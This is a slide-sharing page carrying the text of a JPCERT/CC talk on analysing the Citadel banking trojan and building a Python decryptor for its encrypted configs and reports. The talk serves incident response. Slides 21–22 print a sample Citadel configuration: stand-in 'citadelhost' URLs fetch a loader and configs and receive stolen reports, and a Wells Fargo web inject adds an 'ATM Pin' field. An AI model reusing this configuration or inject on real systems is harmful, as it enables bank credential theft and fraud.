[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
CODE BLUE414 views
[cb22] Tales of 5G hacking by Karsten Nohl by CODE BLUE
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
CODE BLUE94 views
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A... by CODE BLUE
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
CODE BLUE112 views
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... by CODE BLUE
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE14 views
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之 by CODE BLUE
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
CODE BLUE28 views
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... by CODE BLUE
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE28 views
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo by CODE BLUE
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
CODE BLUE14 views
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte... by CODE BLUE
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
CODE BLUE16 views
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman by CODE BLUE
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
CODE BLUE23 views
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... by CODE BLUE
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE9 views
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫 by CODE BLUE
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
CODE BLUE33 views
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-... by CODE BLUE
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
CODE BLUE37 views
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka by CODE BLUE
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
CODE BLUE34 views
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla... by CODE BLUE
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
CODE BLUE8 views
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti... by CODE BLUE
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
CODE BLUE78 views
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info... by CODE BLUE
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
CODE BLUE51 views
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”... by CODE BLUE
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
CODE BLUE13 views
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也 by CODE BLUE
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
CODE BLUE191 views
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat... by CODE BLUE
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
CODE BLUE79 views
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu... by CODE BLUE
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE53 views

Recently uploaded

Evaluation of Quality of Experience of ABR Schemes in Gaming Stream by
Evaluation of Quality of Experience of ABR Schemes in Gaming StreamEvaluation of Quality of Experience of ABR Schemes in Gaming Stream
Evaluation of Quality of Experience of ABR Schemes in Gaming StreamAlpen-Adria-Universität
38 views34 slides
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...ShapeBlue
178 views15 slides
State of the Union - Rohit Yadav - Apache CloudStack by
State of the Union - Rohit Yadav - Apache CloudStackState of the Union - Rohit Yadav - Apache CloudStack
State of the Union - Rohit Yadav - Apache CloudStackShapeBlue
303 views53 slides
Initiating and Advancing Your Strategic GIS Governance Strategy by
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance StrategySafe Software
184 views68 slides
LLMs in Production: Tooling, Process, and Team Structure by
LLMs in Production: Tooling, Process, and Team StructureLLMs in Production: Tooling, Process, and Team Structure
LLMs in Production: Tooling, Process, and Team StructureAggregage
57 views77 slides
Business Analyst Series 2023 - Week 4 Session 7 by
Business Analyst Series 2023 -  Week 4 Session 7Business Analyst Series 2023 -  Week 4 Session 7
Business Analyst Series 2023 - Week 4 Session 7DianaGray10
146 views31 slides

Recently uploaded(20)

Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by ShapeBlue
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
ShapeBlue178 views
State of the Union - Rohit Yadav - Apache CloudStack by ShapeBlue
State of the Union - Rohit Yadav - Apache CloudStackState of the Union - Rohit Yadav - Apache CloudStack
State of the Union - Rohit Yadav - Apache CloudStack
ShapeBlue303 views
Initiating and Advancing Your Strategic GIS Governance Strategy by Safe Software
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance Strategy
Safe Software184 views
LLMs in Production: Tooling, Process, and Team Structure by Aggregage
LLMs in Production: Tooling, Process, and Team StructureLLMs in Production: Tooling, Process, and Team Structure
LLMs in Production: Tooling, Process, and Team Structure
Aggregage57 views
Business Analyst Series 2023 - Week 4 Session 7 by DianaGray10
Business Analyst Series 2023 -  Week 4 Session 7Business Analyst Series 2023 -  Week 4 Session 7
Business Analyst Series 2023 - Week 4 Session 7
DianaGray10146 views
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f... by TrustArc
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...
TrustArc176 views
"Running students' code in isolation. The hard way", Yurii Holiuk by Fwdays
"Running students' code in isolation. The hard way", Yurii Holiuk "Running students' code in isolation. The hard way", Yurii Holiuk
"Running students' code in isolation. The hard way", Yurii Holiuk
Fwdays36 views
Digital Personal Data Protection (DPDP) Practical Approach For CISOs by Priyanka Aash
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash162 views
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit... by ShapeBlue
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
ShapeBlue162 views
"Surviving highload with Node.js", Andrii Shumada by Fwdays
"Surviving highload with Node.js", Andrii Shumada "Surviving highload with Node.js", Andrii Shumada
"Surviving highload with Node.js", Andrii Shumada
Fwdays58 views
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue by ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueCloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
ShapeBlue139 views
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT by ShapeBlue
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBITUpdates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
ShapeBlue208 views
The Role of Patterns in the Era of Large Language Models by Yunyao Li
The Role of Patterns in the Era of Large Language ModelsThe Role of Patterns in the Era of Large Language Models
The Role of Patterns in the Era of Large Language Models
Yunyao Li91 views
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda... by ShapeBlue
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
ShapeBlue164 views
Webinar : Desperately Seeking Transformation - Part 2: Insights from leading... by The Digital Insurer
Webinar : Desperately Seeking Transformation - Part 2:  Insights from leading...Webinar : Desperately Seeking Transformation - Part 2:  Insights from leading...
Webinar : Desperately Seeking Transformation - Part 2: Insights from leading...
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha... by ShapeBlue
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
ShapeBlue183 views

Fight Against Citadel in Japan  by You Nakatsuru

  • 1. Fight Against Citadel in Japan 2014/02/18 JPCERT/CC Analysis Center NAKATSURU You
  • 2. Copyright©2014 JPCERT/CC All rights reserved.1 Agenda Background —Unauthorized Remittance in Japan Analyzing Citadel —Overview —Encryption Making of Citadel Decryptor Citadel Decryptor —Usage —Demo
  • 3. Copyright©2014 JPCERT/CC All rights reserved.2 BACKGROUND
  • 4. Copyright©2014 JPCERT/CC All rights reserved.3 Illegal Transfer in Japan $14million $500k $3million 2011 2012 2013 http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf Targeting 32 Banks
  • 5. Copyright©2014 JPCERT/CC All rights reserved.4 Related with Malware http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf In most cases, passwords are retrieved and abused through defaced web pages where malware request users to authenticate
  • 6. Copyright©2014 JPCERT/CC All rights reserved.5 Banking Trojan ZeuS Ice IX Citadel GameOver SpyEye Carberp etc.
  • 7. Copyright©2014 JPCERT/CC All rights reserved.6 Why Citadel? http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
  • 8. Copyright©2014 JPCERT/CC All rights reserved.7 Banking Trojan Incident Back Connect Server Web Panel Attacker User Internet Banking
  • 9. Copyright©2014 JPCERT/CC All rights reserved.8 Web Injects User Internet Banking
  • 10. Copyright©2014 JPCERT/CC All rights reserved.9 Web Injects Demo
  • 11. Copyright©2014 JPCERT/CC All rights reserved.10 Builder & Web Panel
  • 12. Copyright©2014 JPCERT/CC All rights reserved.11 Underground Market
  • 13. Copyright©2014 JPCERT/CC All rights reserved.12 Our Incident Response Back Connect Server Web Panel Attacker User Internet Banking Information Sharing
  • 14. Copyright©2014 JPCERT/CC All rights reserved.13 Information We Need Back Connect Server Web Panel Attacker User Internet Banking Which site is targeted Where Where How Where
  • 15. Copyright©2014 JPCERT/CC All rights reserved.14 ANALYZING CITADEL
  • 16. Copyright©2014 JPCERT/CC All rights reserved.15 External Information Leaked Citadel Web panel Builder Leaked ZeuS Web panel Builder ZeuS source Web panel source Builder source Binary Debug info Blogs Sophos LEXSI
  • 17. Copyright©2014 JPCERT/CC All rights reserved.16 Analysis Method •Retrieving information Surface Analysis •Monitoring tools, Sandbox and debugging Runtime Analysis •Reading source code, assembly code Static Analysis
  • 18. Copyright©2014 JPCERT/CC All rights reserved.17 Static Analysis Diffing with ZeuS
  • 19. Copyright©2014 JPCERT/CC All rights reserved.18 Citadel Overview Sending report Current settings, etc. Web Injects
  • 20. Copyright©2014 JPCERT/CC All rights reserved.19 Configuration Files •Default settings •Encryption key, URL of Dynamic Config •Encoded and hardcoded Base Config •Additional settings •HTTP Injection, etc… •Downloaded from servers Dynamic Config
  • 21. Copyright©2014 JPCERT/CC All rights reserved.20 botnet "CIT" timer_config 4 9 timer_logs 3 6 timer_stats 4 8 timer_modules 1 4 timer_autoupdate 8 url_config1 "http://citadelhost/folder/file.php|file=config.dll" url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll" remove_certs 1 disable_cookies 0 encryption_key "key123" report_software 1 enable_luhn10_get 0 enable_luhn10_post 1 disable_antivirus 0 use_module_video 1 antiemulation_enable 0 disable_httpgrabber 0 use_module_ffcookie 1 Base Config Dynamic Config URL Password to generate RC4 key
  • 22. Copyright©2014 JPCERT/CC All rights reserved.21 Dynamic Config url_loader "http://citadelhost/folder/file.php|file=soft.exe" url_server "http://citadelhost/folder/gate.php" file_webinjects "injects.txt" url_webinjects "http://citadelhost/folder/file.php" entry "AdvancedConfigs" "http://reserve-host1/folder/file.php|file=config.bin" "http://reserve-host2/folder/file.php|file=config.bin" end entry "WebFilters" "#*wellsfargo.com/*" "@*payment.com/*" "!http://*.com/*.jpg" end (snip) set_url https://www.wellsfargo.com/ GP data_before <div><strong><label for="userid">Username</la data_end data_inject <input type="text" accesskey="U" id="userid" na <DIV><STRONG><LABEL for=userid>ATM Pin</L style="WIDTH: 147px" tabIndex="2" maxLength= <DIV><STRONG><label for="password">Passwo <input type="password" accesskey="P" id="pass <input type="hidden" name="screenid" value="SI <input type="submit" value="Go" name="btnSign <input type="hidden" id="u_p" name="u_p" value </form> data_end
  • 23. Copyright©2014 JPCERT/CC All rights reserved.22 Encryption
  • 24. Copyright©2014 JPCERT/CC All rights reserved.23 Encrypted Data
  • 25. Copyright©2014 JPCERT/CC All rights reserved.24 Encrypted Data Packet POST data (report file) Dynamic Config Additional modules File Report Backup of additional modules Registry Current settings Backup of Dynamic Config
  • 26. Copyright©2014 JPCERT/CC All rights reserved.25 Encryption Method • AES encryption and XOR encoding AES+ • RC4 encryption and XOR encoding RC4+ • Encryption of RC4+ twice RC4+ * 2 • AES+ encryption using random generated key when installd Installed Data
  • 27. Copyright©2014 JPCERT/CC All rights reserved.26 In Case of Dynamic Config Base Config Dynamic Config XOR AES+ UCL
  • 28. Copyright©2014 JPCERT/CC All rights reserved.27 0x400 Bytes Overlay PE file PE file Install setting Installed data Before install After install XOR key ID, Install paths, AES key, StrageArray key, etc. Padding Padding
  • 29. Copyright©2014 JPCERT/CC All rights reserved.28 Encryption Summary Category Data Format Encryption Packet Report Encrypted BinStrage RC4+ Dynamic Config Encrypted BinStrage AES+ Additional modules Executable RC4+ * 2 File Report file StrageArray Installed Data Backup of modules StrageArray Installed Data Registry Backup of Dynamic Config Encrypted BinStrage Installed Data
  • 30. Copyright©2014 JPCERT/CC All rights reserved.29 MAKING OF CITADEL DECRYPTOR
  • 31. Copyright©2014 JPCERT/CC All rights reserved.30 Our Goal Decrypt data & retrieve information for incident response
  • 32. Copyright©2014 JPCERT/CC All rights reserved.31 Implementation Python PyCrypto pefile UCL
  • 33. Copyright©2014 JPCERT/CC All rights reserved.32 RC4+ Decryption Get RC4 keystream RC4 Visual Decrypt
  • 34. Copyright©2014 JPCERT/CC All rights reserved.33 RC4+ Implementation def rc4_plus_decrypt(login_key, base_key, buf): S1 = base_key['state'] S2 = map(ord, login_key) out = "" i = j = k = 0 for c in buf: i = (i + 1) & 0xFF j = (j + S1[i]) & 0xFF S1[i], S1[j] = S1[j], S1[i] out += chr((ord(c) ^ S1[(S1[i]+S1[j])&0xFF]) ^ S2[k%len(S2)]) k += 1 return out
  • 35. Copyright©2014 JPCERT/CC All rights reserved.34 Get AES key AES Decrypt Visual Decrypt AES+ Decryption
  • 36. Copyright©2014 JPCERT/CC All rights reserved.35 AES+ Implementation def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data): aes = AES.new(aes_key) tmp = aes.decrypt(data) out = "" for i in range(len(tmp)): out += chr(ord(tmp[i]) ^ ord(xor_key[i%len(xor_key)])) return out
  • 37. Copyright©2014 JPCERT/CC All rights reserved.36 Decryption Parameter Base Config RC4 key Installed Data StrageArray key Random AES key Others Salt LoginKey RC4 XOR key
  • 38. Copyright©2014 JPCERT/CC All rights reserved.37 Obtaining Parameter re.compile(".*¥x56¥xBA(..)¥x00¥x00¥x52¥x68(....) ¥x50¥xE8....¥x8B¥x0D.*", re.DOTALL)
  • 39. Copyright©2014 JPCERT/CC All rights reserved.38 UCL Decompress http://www.oberhumer.com/opensource/ucl/
  • 40. Copyright©2014 JPCERT/CC All rights reserved.39 UCL Decompress using ctypes def _ucl_decompress(self, data): ucl = cdll.LoadLibrary(UCL) compressed = c_buffer(data) decompressed = c_buffer(DECOMPRESS_MAX_SIZE) decompressed_size = c_int() result = ucl.ucl_nrv2b_decompress_le32( pointer(compressed), c_int(len(compressed.raw)), pointer(decompressed), pointer(decompressed_size)) return decompressed.raw[:decompressed_size.value]
  • 41. Copyright©2014 JPCERT/CC All rights reserved.40 CITADEL DECRYPTOR
  • 42. Copyright©2014 JPCERT/CC All rights reserved.41 Environment • Citadel Decryptor is only available for 32bit environment Windows + 32bit Python • For AES decryption • Windows binary • http://www.voidspace.org.uk/python/modules.shtml#pycrypto PyCrypto • A Python module for parsing PE file format (Windows executable) • For parsing PE sections to get decryption params pefile
  • 43. Copyright©2014 JPCERT/CC All rights reserved.42 Data Requirement Encrypted data Unpacked Citadel • RC4 key • XOR key for AES+ • XOR key for RC4+ (LOGINKEY) • Salt for RC4+ Installed Citadel • Installed Data • Random generated AES key • Random generated StrageArray key
  • 44. Copyright©2014 JPCERT/CC All rights reserved.43 citadel_decryptor.py Encrypted data & unpacked module are always required >citadel_decryptor.py usage: citadel_decryptor.py [-h] [-n] [-a] [-d] [-o OUT] [-D] [-l LOGIN] [-k KEY] [-x XOR] [-s SALT] [-i INSTALLED] [-m MODE] [-v] DAT EXE citadel_decryptor.py: error: too few arguments >
  • 45. Copyright©2014 JPCERT/CC All rights reserved.44 Cheat Sheet The following options have to be specified as well as encrypted data and unpacked Citadel Category Data Option Packet Report -m2 Dynamic Config -d Additional modules -m3 -n File Report files -a -i [Installed Citadel] Backup of modules -a -i [Installed Citadel] Registry Backup of Dynamic Config -d -i [Installed Citadel]
  • 46. Copyright©2014 JPCERT/CC All rights reserved.45 Demo
  • 47. Copyright©2014 JPCERT/CC All rights reserved.46 Tips Convert registry data to binary • Export data using regedit & convert them to binary using the following FileInsight plugin • https://github.com/nmantani/FileInsight-plugins Unpacking • It is easy to break on APIs • WriteProcessMemory • CreateProcessW • VirtualFree / VirtualFreeEx / RtlFreeHeap • Dump executable (not after allocated) from virtual memory • including 0x400 bytes overlay
  • 48. Copyright©2014 JPCERT/CC All rights reserved.47 Future Tasks We already have • ZeuS Decryptor • Ver 2.0.8.9 • Ver 2.9.6.1 • Ice IX Decryptor • etc. We want • Gameover (P2P ZeuS) Decryptor